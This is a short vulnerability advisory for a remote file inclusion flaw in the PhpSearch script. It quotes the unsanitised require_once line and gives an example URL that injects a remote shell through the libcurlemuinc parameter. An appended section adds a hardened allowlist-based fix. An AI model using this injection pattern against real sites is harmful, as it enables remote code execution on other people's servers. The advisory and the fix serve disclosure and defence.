
Php Search Remote Inclusion



Script : PhpSearch 
Bug    : Remote File Inclusion
Author : SekoMirza 
Company : http://www.hawkententerprises.org
Download : http://www.hawkenterprises.org/dev/phpsearch.zip
Dork : not yet
_____________________________________________

Where :
phpsearch/utils/class_HTTPRetriever.php

Bug : 
if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);

Explanation : 
If class_HTTPRetriever.php is readable, you can execute malicious code through the libcurlemuinc parameter.

Example : 
http://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL]

_____________________________________________

Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM and all hackers
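
A hardened form of the include shown under "Bug", as an added example that is not part of the original advisory and not PhpSearch's own code: the path is built from a fixed allowlist and the script's own directory, so a request value named libcurlemuinc can no longer choose the file. The library file name and the function name resolve_optional_lib are assumptions made for illustration.

```php
<?php
// Added example, not PhpSearch code. The file name below is a placeholder.

// Fixed allowlist: logical name => file name inside the library directory.
const OPTIONAL_LIBS = [
    'libcurlemu' => 'libcurlemu-placeholder.inc.php', // placeholder name
];

/**
 * Resolve an allowlisted library to a real path inside $baseDir, or
 * return null. No request data takes part in building the path.
 */
function resolve_optional_lib(string $name, string $baseDir): ?string
{
    if (!isset(OPTIONAL_LIBS[$name])) {
        return null;                      // unknown library name
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                      // base directory does not exist
    }
    // realpath() collapses ../ and symlinks and returns false when the
    // file does not exist on the local filesystem.
    $path = realpath($base . DIRECTORY_SEPARATOR . OPTIONAL_LIBS[$name]);
    if ($path === false || !is_file($path) || !is_readable($path)) {
        return null;
    }
    // After resolution the file must still live under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Replaces: if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);
$lib = resolve_optional_lib('libcurlemu', __DIR__);
if ($lib !== null) {
    require_once $lib;
}
```

As defence in depth, keep `allow_url_include = Off` in php.ini so that include and require refuse URL wrappers even if a path check is missed elsewhere.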